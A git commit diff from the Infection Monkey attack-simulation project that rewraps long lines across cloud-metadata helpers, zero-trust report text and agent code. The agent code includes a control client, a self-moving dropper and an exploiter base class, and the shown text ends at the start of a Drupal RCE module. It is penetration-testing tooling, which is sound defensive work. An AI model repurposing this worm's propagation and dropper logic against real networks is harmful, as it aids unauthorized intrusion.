All E501 errors fixed, but formatting screwed up

This commit is contained in:
VakarisZ 2021-04-07 11:11:09 +03:00 committed by Mike Salvatore
parent ad2b2f88f5
commit 03bcfc97af
361 changed files with 6078 additions and 5521 deletions

View File

@ -33,7 +33,8 @@ class PerformanceAnalyzer(Analyzer):
if self.performance_test_config.break_on_timeout and not performance_is_good_enough:
LOGGER.warning(
"Calling breakpoint - pausing to enable investigation of island. Type 'c' to continue once you're done "
"Calling breakpoint - pausing to enable investigation of island. "
"Type 'c' to continue once you're done "
"investigating. Type 'p timings' and 'p total_time' to see performance information."
)
breakpoint()

View File

@ -1,6 +1,7 @@
import random
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import (
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.\
sample_multiplier.fake_ip_generator import (
FakeIpGenerator,
)

View File

@ -9,10 +9,12 @@ from tqdm import tqdm
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_file_parser import (
SampleFileParser,
)
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import (
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.\
sample_multiplier.fake_ip_generator import (
FakeIpGenerator,
)
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_monkey import (
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.\
sample_multiplier.fake_monkey import (
FakeMonkey,
)

View File

@ -1,6 +1,7 @@
from unittest import TestCase
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import (
from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.\
sample_multiplier.fake_ip_generator import (
FakeIpGenerator,
)

View File

@ -9,7 +9,6 @@ from common.cloud.instance import CloudInstance
__author__ = "itay.mizeretz"
AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS = "169.254.169.254"
AWS_LATEST_METADATA_URI_PREFIX = "http://{0}/latest/".format(AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS)
ACCOUNT_ID_KEY = "accountId"
@ -49,7 +48,8 @@ class AwsInstance(CloudInstance):
try:
self.account_id = self._extract_account_id(
requests.get(
AWS_LATEST_METADATA_URI_PREFIX + "dynamic/instance-identity/document", timeout=2
AWS_LATEST_METADATA_URI_PREFIX + "dynamic/instance-identity/document",
timeout=2
).text
)
except (requests.RequestException, json.decoder.JSONDecodeError, IOError) as e:
@ -60,7 +60,8 @@ class AwsInstance(CloudInstance):
@staticmethod
def _parse_region(region_url_response):
# For a list of regions, see:
# https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts.RegionsAndAvailabilityZones.html
# https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts
# .RegionsAndAvailabilityZones.html
# This regex will find any AWS region format string in the response.
re_phrase = r"((?:us|eu|ap|ca|cn|sa)-[a-z]*-[0-9])"
finding = re.findall(re_phrase, region_url_response, re.IGNORECASE)
@ -79,9 +80,11 @@ class AwsInstance(CloudInstance):
def _extract_account_id(instance_identity_document_response):
"""
Extracts the account id from the dynamic/instance-identity/document metadata path.
Based on https://forums.aws.amazon.com/message.jspa?messageID=409028 which has a few more solutions,
Based on https://forums.aws.amazon.com/message.jspa?messageID=409028 which has a few more
solutions,
in case Amazon break this mechanism.
:param instance_identity_document_response: json returned via the web page ../dynamic/instance-identity/document
:param instance_identity_document_response: json returned via the web page
../dynamic/instance-identity/document
:return: The account id
"""
return json.loads(instance_identity_document_response)[ACCOUNT_ID_KEY]

View File

@ -31,12 +31,14 @@ def filter_instance_data_from_aws_response(response):
class AwsService(object):
"""
A wrapper class around the boto3 client and session modules, which supplies various AWS services.
A wrapper class around the boto3 client and session modules, which supplies various AWS
services.
This class will assume:
1. That it's running on an EC2 instance
2. That the instance is associated with the correct IAM role. See
https://boto3.amazonaws.com/v1/documentation/api/latest/guide/configuration.html#iam-role for details.
https://boto3.amazonaws.com/v1/documentation/api/latest/guide/configuration.html#iam-role
for details.
"""
region = None
@ -73,7 +75,8 @@ class AwsService(object):
Get the information for all instances with the relevant roles.
This function will assume that it's running on an EC2 instance with the correct IAM role.
See https://boto3.amazonaws.com/v1/documentation/api/latest/guide/configuration.html#iam-role for details.
See https://boto3.amazonaws.com/v1/documentation/api/latest/guide/configuration.html#iam
-role for details.
:raises: botocore.exceptions.ClientError if can't describe local instance information.
:return: All visible instances from this instance

View File

@ -30,7 +30,6 @@ INSTANCE_IDENTITY_DOCUMENT_RESPONSE = """
}
"""
EXPECTED_INSTANCE_ID = "i-1234567890abcdef0"
EXPECTED_REGION = "us-west-2"

View File

@ -9,7 +9,8 @@ from common.common_consts.timeouts import SHORT_REQUEST_TIMEOUT
LATEST_AZURE_METADATA_API_VERSION = "2019-04-30"
AZURE_METADATA_SERVICE_URL = (
"http://169.254.169.254/metadata/instance?api-version=%s" % LATEST_AZURE_METADATA_API_VERSION
"http://169.254.169.254/metadata/instance?api-version=%s" %
LATEST_AZURE_METADATA_API_VERSION
)
logger = logging.getLogger(__name__)
@ -18,7 +19,8 @@ logger = logging.getLogger(__name__)
class AzureInstance(CloudInstance):
"""
Access to useful information about the current machine if it's an Azure VM.
Based on Azure metadata service: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service
Based on Azure metadata service:
https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service
"""
def is_instance(self):
@ -44,7 +46,8 @@ class AzureInstance(CloudInstance):
)
# If not on cloud, the metadata URL is non-routable and the connection will fail.
# If on AWS, should get 404 since the metadata service URL is different, so bool(response) will be false.
# If on AWS, should get 404 since the metadata service URL is different,
# so bool(response) will be false.
if response:
logger.debug("Trying to parse Azure metadata.")
self.try_parse_response(response)
@ -52,7 +55,8 @@ class AzureInstance(CloudInstance):
logger.warning(f"Metadata response not ok: {response.status_code}")
except requests.RequestException:
logger.debug(
"Failed to get response from Azure metadata service: This instance is not on Azure."
"Failed to get response from Azure metadata service: This instance is not on "
"Azure."
)
def try_parse_response(self, response):

View File

@ -30,7 +30,8 @@ GOOD_DATA = {
],
"publisher":"RDFE-Test-Microsoft-Windows-Server-Group",
"resourceGroupName":"macikgo-test-may-23",
"resourceId": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/resourceGroups/macikgo-test-may-23/"
"resourceId":"/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/resourceGroups/macikgo-test"
"-may-23/"
"providers/Microsoft.Compute/virtualMachines/examplevmname",
"securityProfile":{"secureBootEnabled":"true", "virtualTpmEnabled":"false"},
"sku":"Windows-Server-2012-R2-Datacenter",
@ -101,12 +102,16 @@ GOOD_DATA = {
},
}
BAD_DATA_NOT_JSON = '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/\
xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml">\n<head>\n<meta content="text/html; charset=utf-8" \
http-equiv="Content-Type" />\n<meta content="no-cache" http-equiv="Pragma" />\n<title>Waiting...</title>\n<script type="text/\
javascript">\nvar pageName = \'/\';\ntop.location.replace(pageName);\n</script>\n</head>\n<body> </body>\n</html>\n'
BAD_DATA_NOT_JSON = (
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" '
'"http://www.w3.org/TR/xhtml1/DTD/\
xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml">\n<head>\n<meta '
'content="text/html; charset=utf-8" \
http-equiv="Content-Type" />\n<meta content="no-cache" http-equiv="Pragma" '
"/>\n<title>Waiting...</title>\n<script type=\"text/\
javascript\">\nvar pageName = '/';\ntop.location.replace(pageName);\n</script>\n</head>\n<body> "
"</body>\n</html>\n"
)
BAD_DATA_JSON = {"":""}

View File

@ -8,13 +8,13 @@ from common.common_consts.timeouts import SHORT_REQUEST_TIMEOUT
logger = logging.getLogger(__name__)
GCP_METADATA_SERVICE_URL = "http://metadata.google.internal/"
class GcpInstance(CloudInstance):
"""
Used to determine if on GCP. See https://cloud.google.com/compute/docs/storing-retrieving-metadata#runninggce
Used to determine if on GCP. See https://cloud.google.com/compute/docs/storing-retrieving
-metadata#runninggce
"""
def is_instance(self):

View File

@ -20,7 +20,8 @@ class AwsCmdResult(CmdResult):
@staticmethod
def is_successful(command_info, is_timeout=False):
"""
Determines whether the command was successful. If it timed out and was still in progress, we assume it worked.
Determines whether the command was successful. If it timed out and was still in progress,
we assume it worked.
:param command_info: Command info struct (returned by ssm.get_command_invocation)
:param is_timeout: Whether the given command timed out
:return: True if successful, False otherwise.

View File

@ -21,8 +21,10 @@ class CmdRunner(object):
* command id - any unique identifier of a command which was already run
* command result - represents the result of running a command. Always of type CmdResult
* command status - represents the current status of a command. Always of type CmdStatus
* command info - Any consistent structure representing additional information of a command which was already run
* instance - a machine that commands will be run on. Can be any dictionary with 'instance_id' as a field
* command info - Any consistent structure representing additional information of a command
which was already run
* instance - a machine that commands will be run on. Can be any dictionary with 'instance_id'
as a field
* instance_id - any unique identifier of an instance (machine). Can be of any format
"""
@ -49,7 +51,8 @@ class CmdRunner(object):
"""
Run multiple commands on various instances
:param instances: List of instances.
:param inst_to_cmd: Function which receives an instance, runs a command asynchronously and returns Cmd
:param inst_to_cmd: Function which receives an instance, runs a command asynchronously
and returns Cmd
:param inst_n_cmd_res_to_res: Function which receives an instance and CmdResult
and returns a parsed result (of any format)
:return: Dictionary with 'instance_id' as key and parsed result as value

View File

@ -1,8 +1,10 @@
"""
This file contains all the static data relating to Zero Trust. It is mostly used in the zero trust report generation and
This file contains all the static data relating to Zero Trust. It is mostly used in the zero
trust report generation and
in creating findings.
This file contains static mappings between zero trust components such as: pillars, principles, tests, statuses.
This file contains static mappings between zero trust components such as: pillars, principles,
tests, statuses.
Some of the mappings are computed when this module is loaded.
"""
@ -79,15 +81,22 @@ PRINCIPLE_DISASTER_RECOVERY = "data_backup"
PRINCIPLE_SECURE_AUTHENTICATION = "secure_authentication"
PRINCIPLE_MONITORING_AND_LOGGING = "monitoring_and_logging"
PRINCIPLES = {
PRINCIPLE_SEGMENTATION: "Apply segmentation and micro-segmentation inside your network.",
PRINCIPLE_SEGMENTATION:"Apply segmentation and micro-segmentation inside your "
""
""
"network.",
PRINCIPLE_ANALYZE_NETWORK_TRAFFIC:"Analyze network traffic for malicious activity.",
PRINCIPLE_USER_BEHAVIOUR:"Adopt security user behavior analytics.",
PRINCIPLE_ENDPOINT_SECURITY: "Use anti-virus and other traditional endpoint security solutions.",
PRINCIPLE_ENDPOINT_SECURITY:"Use anti-virus and other traditional endpoint "
"security solutions.",
PRINCIPLE_DATA_CONFIDENTIALITY:"Ensure data's confidentiality by encrypting it.",
PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES: "Configure network policies to be as restrictive as possible.",
PRINCIPLE_USERS_MAC_POLICIES: "Users' permissions to the network and to resources should be MAC (Mandatory "
PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES:"Configure network policies to be as restrictive as "
"possible.",
PRINCIPLE_USERS_MAC_POLICIES:"Users' permissions to the network and to resources "
"should be MAC (Mandatory "
"Access Control) only.",
PRINCIPLE_DISASTER_RECOVERY: "Ensure data and infrastructure backups for disaster recovery scenarios.",
PRINCIPLE_DISASTER_RECOVERY:"Ensure data and infrastructure backups for disaster "
"recovery scenarios.",
PRINCIPLE_SECURE_AUTHENTICATION:"Ensure secure authentication process's.",
PRINCIPLE_MONITORING_AND_LOGGING:"Ensure monitoring and logging in network resources.",
}
@ -99,32 +108,40 @@ FINDING_EXPLANATION_BY_STATUS_KEY = "finding_explanation"
TEST_EXPLANATION_KEY = "explanation"
TESTS_MAP = {
TEST_SEGMENTATION:{
TEST_EXPLANATION_KEY: "The Monkey tried to scan and find machines that it can communicate with from the machine it's "
TEST_EXPLANATION_KEY:"The Monkey tried to scan and find machines that it can "
"communicate with from the machine it's "
"running on, that belong to different network segments.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED: "Monkey performed cross-segment communication. Check firewall rules and logs.",
STATUS_PASSED: "Monkey couldn't perform cross-segment communication. If relevant, check firewall logs.",
STATUS_FAILED:"Monkey performed cross-segment communication. Check firewall rules and"
" logs.",
STATUS_PASSED:"Monkey couldn't perform cross-segment communication. If relevant, "
"check firewall logs.",
},
PRINCIPLE_KEY:PRINCIPLE_SEGMENTATION,
PILLARS_KEY:[NETWORKS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED],
},
TEST_MALICIOUS_ACTIVITY_TIMELINE:{
TEST_EXPLANATION_KEY: "The Monkeys in the network performed malicious-looking actions, like scanning and attempting "
TEST_EXPLANATION_KEY:"The Monkeys in the network performed malicious-looking "
"actions, like scanning and attempting "
"exploitation.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_VERIFY: "Monkey performed malicious actions in the network. Check SOC logs and alerts."
STATUS_VERIFY:"Monkey performed malicious actions in the network. Check SOC logs and "
"alerts."
},
PRINCIPLE_KEY:PRINCIPLE_ANALYZE_NETWORK_TRAFFIC,
PILLARS_KEY:[NETWORKS, VISIBILITY_ANALYTICS],
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_VERIFY],
},
TEST_ENDPOINT_SECURITY_EXISTS:{
TEST_EXPLANATION_KEY: "The Monkey checked if there is an active process of an endpoint security software.",
TEST_EXPLANATION_KEY:"The Monkey checked if there is an active process of an "
"endpoint security software.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and activate anti-virus "
STATUS_FAILED:"Monkey didn't find ANY active endpoint security processes. Install and "
"activate anti-virus "
"software on endpoints.",
STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to see if Monkey was a "
STATUS_PASSED:"Monkey found active endpoint security processes. Check their logs to "
"see if Monkey was a "
"security concern. ",
},
PRINCIPLE_KEY:PRINCIPLE_ENDPOINT_SECURITY,
@ -132,9 +149,11 @@ TESTS_MAP = {
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_MACHINE_EXPLOITED:{
TEST_EXPLANATION_KEY: "The Monkey tries to exploit machines in order to breach them and propagate in the network.",
TEST_EXPLANATION_KEY:"The Monkey tries to exploit machines in order to "
"breach them and propagate in the network.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see activity recognized and see "
STATUS_FAILED:"Monkey successfully exploited endpoints. Check IDS/IPS logs to see "
"activity recognized and see "
"which endpoints were compromised.",
STATUS_PASSED:"Monkey didn't manage to exploit an endpoint.",
},
@ -145,7 +164,8 @@ TESTS_MAP = {
TEST_SCHEDULED_EXECUTION:{
TEST_EXPLANATION_KEY:"The Monkey was executed in a scheduled manner.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in User-Behavior security "
STATUS_VERIFY:"Monkey was executed in a scheduled manner. Locate this activity in "
"User-Behavior security "
"software.",
STATUS_PASSED:"Monkey failed to execute in a scheduled manner.",
},
@ -154,10 +174,13 @@ TESTS_MAP = {
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_VERIFY],
},
TEST_DATA_ENDPOINT_ELASTIC:{
TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to ElasticSearch instances.",
TEST_EXPLANATION_KEY:"The Monkey scanned for unencrypted access to "
"ElasticSearch instances.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED: "Monkey accessed ElasticSearch instances. Limit access to data by encrypting it in in-transit.",
STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such instances, look for alerts "
STATUS_FAILED:"Monkey accessed ElasticSearch instances. Limit access to data by "
"encrypting it in in-transit.",
STATUS_PASSED:"Monkey didn't find open ElasticSearch instances. If you have such "
"instances, look for alerts "
"that indicate attempts to access them. ",
},
PRINCIPLE_KEY:PRINCIPLE_DATA_CONFIDENTIALITY,
@ -165,10 +188,12 @@ TESTS_MAP = {
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_DATA_ENDPOINT_HTTP:{
TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to HTTP servers.",
TEST_EXPLANATION_KEY:"The Monkey scanned for unencrypted access to HTTP " "servers.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED: "Monkey accessed HTTP servers. Limit access to data by encrypting it in in-transit.",
STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, look for alerts that indicate "
STATUS_FAILED:"Monkey accessed HTTP servers. Limit access to data by encrypting it in"
" in-transit.",
STATUS_PASSED:"Monkey didn't find open HTTP servers. If you have such servers, "
"look for alerts that indicate "
"attempts to access them. ",
},
PRINCIPLE_KEY:PRINCIPLE_DATA_CONFIDENTIALITY,
@ -176,10 +201,12 @@ TESTS_MAP = {
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_DATA_ENDPOINT_POSTGRESQL:{
TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to PostgreSQL servers.",
TEST_EXPLANATION_KEY:"The Monkey scanned for unencrypted access to " "PostgreSQL servers.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED: "Monkey accessed PostgreSQL servers. Limit access to data by encrypting it in in-transit.",
STATUS_PASSED: "Monkey didn't find open PostgreSQL servers. If you have such servers, look for alerts that "
STATUS_FAILED:"Monkey accessed PostgreSQL servers. Limit access to data by encrypting"
" it in in-transit.",
STATUS_PASSED:"Monkey didn't find open PostgreSQL servers. If you have such servers, "
"look for alerts that "
"indicate attempts to access them. ",
},
PRINCIPLE_KEY:PRINCIPLE_DATA_CONFIDENTIALITY,
@ -189,7 +216,8 @@ TESTS_MAP = {
TEST_TUNNELING:{
TEST_EXPLANATION_KEY:"The Monkey tried to tunnel traffic using other monkeys.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies are too permissive - "
STATUS_FAILED:"Monkey tunneled its traffic using other monkeys. Your network policies "
"are too permissive - "
"restrict them. "
},
PRINCIPLE_KEY:PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
@ -197,9 +225,11 @@ TESTS_MAP = {
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED],
},
TEST_COMMUNICATE_AS_NEW_USER:{
TEST_EXPLANATION_KEY: "The Monkey tried to create a new user and communicate with the internet from it.",
TEST_EXPLANATION_KEY:"The Monkey tried to create a new user and communicate "
"with the internet from it.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies are too permissive - "
STATUS_FAILED:"Monkey caused a new user to access the network. Your network policies "
"are too permissive - "
"restrict them to MAC only.",
STATUS_PASSED:"Monkey wasn't able to cause a new user to access the network.",
},
@ -218,7 +248,7 @@ TESTS_MAP = {
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_UNENCRYPTED_DATA:{
TEST_EXPLANATION_KEY: "ScoutSuite searched for resources containing unencrypted data.",
TEST_EXPLANATION_KEY:"ScoutSuite searched for resources containing " "unencrypted data.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"ScoutSuite found resources with unencrypted data.",
STATUS_PASSED:"ScoutSuite found no resources with unencrypted data.",
@ -228,7 +258,8 @@ TESTS_MAP = {
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_DATA_LOSS_PREVENTION:{
TEST_EXPLANATION_KEY: "ScoutSuite searched for resources which are not protected against data loss.",
TEST_EXPLANATION_KEY:"ScoutSuite searched for resources which are not "
"protected against data loss.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"ScoutSuite found resources not protected against data loss.",
STATUS_PASSED:"ScoutSuite found that all resources are secured against data loss.",
@ -238,7 +269,7 @@ TESTS_MAP = {
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_SECURE_AUTHENTICATION:{
TEST_EXPLANATION_KEY: "ScoutSuite searched for issues related to users' authentication.",
TEST_EXPLANATION_KEY:"ScoutSuite searched for issues related to users' " "authentication.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"ScoutSuite found issues related to users' authentication.",
STATUS_PASSED:"ScoutSuite found no issues related to users' authentication.",
@ -248,7 +279,7 @@ TESTS_MAP = {
POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
TEST_SCOUTSUITE_RESTRICTIVE_POLICIES:{
TEST_EXPLANATION_KEY: "ScoutSuite searched for permissive user access policies.",
TEST_EXPLANATION_KEY:"ScoutSuite searched for permissive user access " "policies.",
FINDING_EXPLANATION_BY_STATUS_KEY:{
STATUS_FAILED:"ScoutSuite found permissive user access policies.",
STATUS_PASSED:"ScoutSuite found no issues related to user access policies.",

View File

@ -159,7 +159,8 @@ class SingleIpRange(NetworkRange):
@staticmethod
def string_to_host(string_):
"""
Converts the string that user entered in "Scan IP/subnet list" to a tuple of domain name and ip
Converts the string that user entered in "Scan IP/subnet list" to a tuple of domain name
and ip
:param string_: String that was entered in "Scan IP/subnet list"
:return: A tuple in format (IP, domain_name). Eg. (192.168.55.1, www.google.com)
"""

View File

@ -4,8 +4,10 @@ from urllib.parse import urlparse
def get_host_from_network_location(network_location: str) -> str:
"""
URL structure is "<scheme>://<net_loc>/<path>;<params>?<query>#<fragment>" (https://tools.ietf.org/html/rfc1808.html)
And the net_loc is "<user>:<password>@<host>:<port>" (https://tools.ietf.org/html/rfc1738#section-3.1)
URL structure is "<scheme>://<net_loc>/<path>;<params>?<query>#<fragment>" (
https://tools.ietf.org/html/rfc1808.html)
And the net_loc is "<user>:<password>@<host>:<port>" (
https://tools.ietf.org/html/rfc1738#section-3.1)
:param network_location: server network location
:return: host part of the network location
"""

View File

@ -14,8 +14,10 @@ def get_ip_in_src_and_not_in_dst(ip_addresses, source_subnet, target_subnet):
def get_ip_if_in_subnet(ip_addresses, subnet):
"""
:param ip_addresses: IP address list.
:param subnet: Subnet to check if one of ip_addresses is in there. This is common.network.network_range.NetworkRange
:return: The first IP in ip_addresses which is in the subnet if there is one, otherwise returns None.
:param subnet: Subnet to check if one of ip_addresses is in there. This is
common.network.network_range.NetworkRange
:return: The first IP in ip_addresses which is in the subnet if there is one, otherwise
returns None.
"""
for ip_address in ip_addresses:
if subnet.is_in_range(ip_address):

View File

@ -15,7 +15,8 @@ class ScanStatus(Enum):
class UsageEnum(Enum):
SMB = {
ScanStatus.USED.value:"SMB exploiter ran the monkey by creating a service via MS-SCMR.",
ScanStatus.SCANNED.value: "SMB exploiter failed to run the monkey by creating a service via MS-SCMR.",
ScanStatus.SCANNED.value:"SMB exploiter failed to run the monkey by creating a service "
"via MS-SCMR.",
}
MIMIKATZ = {
ScanStatus.USED.value:"Windows module loader was used to load Mimikatz DLL.",
@ -29,7 +30,8 @@ class UsageEnum(Enum):
ScanStatus.USED.value:"WinAPI was used to mark monkey files for deletion on next boot."
}
SINGLETON_WINAPI = {
ScanStatus.USED.value: "WinAPI was called to acquire system singleton for monkey's process.",
ScanStatus.USED.value:"WinAPI was called to acquire system singleton for monkey's "
"process.",
ScanStatus.SCANNED.value:"WinAPI call to acquire system singleton"
" for monkey process wasn't successful.",
}

View File

@ -1,4 +1,5 @@
# To get the version from shell, run `python ./version.py` (see `python ./version.py -h` for details).
# To get the version from shell, run `python ./version.py` (see `python ./version.py -h` for
# details).
import argparse
from pathlib import Path
@ -17,7 +18,8 @@ def get_version(build=BUILD):
def print_version():
parser = argparse.ArgumentParser()
parser.add_argument(
"-b", "--build", default=BUILD, help="Choose the build string for this version.", type=str
"-b", "--build", default=BUILD, help="Choose the build string for this version.",
type=str
)
args = parser.parse_args()
print(get_version(args.build))

View File

@ -227,7 +227,8 @@ class Configuration(object):
@staticmethod
def hash_sensitive_data(sensitive_data):
"""
Hash sensitive data (e.g. passwords). Used so the log won't contain sensitive data plain-text, as the log is
Hash sensitive data (e.g. passwords). Used so the log won't contain sensitive data
plain-text, as the log is
saved on client machines plain-text.
:param sensitive_data: the data to hash.

View File

@ -23,7 +23,6 @@ from infection_monkey.utils.exceptions.planned_shutdown_exception import Planned
__author__ = "hoffer"
requests.packages.urllib3.disable_warnings()
LOG = logging.getLogger(__name__)
@ -32,7 +31,8 @@ DOWNLOAD_CHUNK = 1024
PBA_FILE_DOWNLOAD = "https://%s/api/pba/download/%s"
# random number greater than 5,
# to prevent the monkey from just waiting forever to try and connect to an island before going elsewhere.
# to prevent the monkey from just waiting forever to try and connect to an island before going
# elsewhere.
TIMEOUT_IN_SECONDS = 15
@ -141,7 +141,8 @@ class ControlClient(object):
)
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
)
return {}
@ -156,7 +157,8 @@ class ControlClient(object):
try:
telemetry = {"monkey_guid":GUID, "telem_category":telem_category, "data":json_data}
requests.post(
"https://%s/api/telemetry" % (WormConfiguration.current_server,), # noqa: DUO123
"https://%s/api/telemetry" % (WormConfiguration.current_server,),
# noqa: DUO123
data=json.dumps(telemetry),
headers={"content-type":"application/json"},
verify=False,
@ -165,7 +167,8 @@ class ControlClient(object):
)
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
)
@staticmethod
@ -184,7 +187,8 @@ class ControlClient(object):
)
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
)
@staticmethod
@ -202,7 +206,8 @@ class ControlClient(object):
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
)
return
@ -241,7 +246,8 @@ class ControlClient(object):
)
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
)
return {}
@ -310,7 +316,8 @@ class ControlClient(object):
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
)
@staticmethod
@ -343,7 +350,8 @@ class ControlClient(object):
except Exception as exc:
LOG.warning(
"Error connecting to control server %s: %s", WormConfiguration.current_server, exc
"Error connecting to control server %s: %s", WormConfiguration.current_server,
exc
)
return None, None
@ -371,7 +379,8 @@ class ControlClient(object):
def get_pba_file(filename):
try:
return requests.get(
PBA_FILE_DOWNLOAD % (WormConfiguration.current_server, filename), # noqa: DUO123
PBA_FILE_DOWNLOAD % (WormConfiguration.current_server, filename),
# noqa: DUO123
verify=False,
proxies=ControlClient.proxies,
timeout=LONG_REQUEST_TIMEOUT,
@ -412,7 +421,10 @@ class ControlClient(object):
@staticmethod
def can_island_see_port(port):
try:
url = f"https://{WormConfiguration.current_server}/api/monkey_control/check_remote_port/{port}"
url = (
f"https://{WormConfiguration.current_server}/api/monkey_control"
f"/check_remote_port/{port}"
)
response = requests.get(url, verify=False, timeout=SHORT_REQUEST_TIMEOUT)
response = json.loads(response.content.decode())
return response["status"] == "port_visible"

View File

@ -152,7 +152,8 @@ class MonkeyDrops(object):
)
else:
dest_path = self._config["destination_path"]
# In linux we have a more complex commandline. There's a general outer one, and the inner one which actually
# In linux we have a more complex commandline. There's a general outer one,
# and the inner one which actually
# runs the monkey
inner_monkey_cmdline = (
MONKEY_CMDLINE_LINUX % {"monkey_filename":dest_path.split("/")[-1]}
@ -188,7 +189,8 @@ class MonkeyDrops(object):
try:
if (
(self._config["source_path"].lower() != self._config["destination_path"].lower())
(self._config["source_path"].lower() != self._config[
"destination_path"].lower())
and os.path.exists(self._config["source_path"])
and WormConfiguration.dropper_try_move_first
):
@ -207,7 +209,8 @@ class MonkeyDrops(object):
dropper_source_path_ctypes, None, MOVEFILE_DELAY_UNTIL_REBOOT
):
LOG.debug(
"Error marking source file '%s' for deletion on next boot (error %d)",
"Error marking source file '%s' for deletion on next boot (error "
"%d)",
self._config["source_path"],
ctypes.windll.kernel32.GetLastError(),
)

View File

@ -10,7 +10,6 @@ from infection_monkey.utils.plugins.plugin import Plugin
__author__ = "itamar"
logger = logging.getLogger(__name__)
@ -37,7 +36,8 @@ class HostExploiter(Plugin):
EXPLOIT_TYPE = ExploitType.VULNERABILITY
# Determines if successful exploitation should stop further exploit attempts on that machine.
# Generally, should be True for RCE type exploiters and False if we don't expect the exploiter to run the monkey agent.
# Generally, should be True for RCE type exploiters and False if we don't expect the
# exploiter to run the monkey agent.
# Example: Zerologon steals credentials
RUNS_AGENT_ON_SUCCESS = True

View File

@ -1,7 +1,8 @@
"""
Remote Code Execution on Drupal server - CVE-2019-6340
Implementation is based on:
https://gist.github.com/leonjza/d0ab053be9b06fa020b66f00358e3d88/f9f6a5bb6605745e292bee3a4079f261d891738a.
